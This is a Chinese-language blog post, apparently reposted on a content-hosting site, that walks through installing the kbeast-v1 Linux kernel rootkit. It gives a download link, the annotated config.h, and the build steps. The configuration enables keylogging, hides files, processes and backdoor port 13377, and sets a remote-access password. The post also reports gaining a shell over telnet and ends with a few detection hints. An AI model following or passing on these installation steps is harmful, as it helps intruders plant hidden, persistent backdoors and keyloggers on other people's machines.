打开APP
userphoto
未登录

开通VIP,畅享免费电子书等14项超值服

开通VIP
rootkit(kbeast-v1)

 

 

Rootkit有应用级、内核级和硬件级

用的比较多的是内核级别,比如基于linux LKM编写的rootkit

 

rootkit可以理解为一个超级管理员的工具箱,这个工具箱通过调用系统LKM接口可以动态实现对内核功能的修改,从而实现相比普通后门程序的变态级功能,比如:

1、替换    ====> 可以将系统命令替换成其他内容,比如将ls替换成rm,这样一来当你敲入ls时实际执行的是rm

2、隐藏     ====>可以隐藏自身文件(ls看不到)、隐藏进程(ps aux看不到)、连接隐藏(netstat看不到开放的端口)等

3、嗅探    ====>可以实现键盘记录、网络访问记录等

 

正因为rootkit如此变态,因此很多黑客会在拿到目标主机后通过安装rootkit这种超级后门来隐藏自己和持续的控制该主机

 

需要注意的是因为rootkit是内核级别的代码,故要求root权限才能运行,并且rootkit要适配对应的linux内核版本!(功能牛X,但使用条件也苛刻啊- -!)

 

此处拿kbeast-v1这款rootkit来举例,附上下载链接:

http://www.core.ipsecs.com/rootkit/kernel-rootkit/

 下载得到ipsecs-kbeast-v1.tar文件,tar -zvxf ipsecs-kbeast-v1.tar得到kbeast-v1文件夹,其中包含如下文件:

config.h 为配置文件,在安装之前需要先对该配置文件进行修改

config.h:

/*Kernel Beast Ver #1.0 - Configuration FileCopyright Ph03n1X of IPSECS (c) 2011Get more research of ours http://ipsecs.com*//*Don't change this line*/#define TRUE 1#define FALSE 0/*Enable keylog probably makes the system unstableBut worth to be tried*/#define _KEYLOG_ TRUE/*Define your module & network daemon name*/#define KBEAST "kbeast"/*All files, dirs, process will be hiddenProtected from deletion & being killed*/#define _H4X0R_ "_h4x_"/*Directory where your rootkit will be savedYou have to use _H4X0R_ in your directory nameNo slash (/) at the end*/#define _H4X_PATH_ "/usr/_h4x_"    =====>此处为安装路径,可以视情况修改。安装完成后该文件夹ls时不显示,cd _h4x_ 可以进入。/*File to save key logged data*/#define _LOGFILE_ "acctlog"    =====>日志(键盘记录)存放文件/*This port will be hidded from netstat*/#define _HIDE_PORT_ 13377    ======>监听端口(用作后门连接,远程telnet这台设备的13377端口即可获取shell)/*Password for remote access*/#define _RPASSWORD_ "123456"      ======>远程连接到这台设备时的密码#define _MAGIC_NAME_ "test01"       ======>远程连接过来时给与什么账户(如果此处设为'root'则telnet过来时就是root权限)/*Magic signal & pid for local escalation*/#define _MAGIC_SIG_ 37 //kill signal#define _MAGIC_PID_ 31337 //kill this pid

接下来开始安装步骤:

执行 ./setup 时显示:

build参数:安装

clean参数:卸载

version:可以看见支持2.6.18和2.6.32版本的内核

 

 

执行 ./setup build 开始安装

结果如上,显示安装完成

 

此时远程连接此设备的13377端口,成功进入该设备,且得到的用户为指定用户

 

 

总结:

安装完成后netstat看不到对应的侦听端口,但是扫描可以发现(因为扫描相当于真实去连接这个端口)

在usr下ls看不到相应目录,但是cd /usr/_h4x_可以进入

键盘记录存储于/usr/_h4x_下的acctlog.0

ps aux时看不到进程,但是ps aux|grep h4x时可以看到

 

本站仅提供存储服务,所有内容均由用户发布,如发现有害或侵权内容,请点击举报
打开APP,阅读全文并永久保存 查看更多类似文章
猜你喜欢
类似文章
【热】打开小程序,算一算2024你的财运
Linux后门入侵检测工具
从流氓软件说说DLL动态插入技术与Rootkit技术
由浅入深 恶意软件逃避检测的六个秘密之地
白远方
NT内核简介:HIPS与现代木马
rootkit概述
更多类似文章 >>
生活服务
热点新闻
分享 收藏 导长图 关注 下载文章
绑定账号成功
后续可登录账号畅享VIP特权!
如果VIP功能使用有故障,
可点击这里联系客服!

联系客服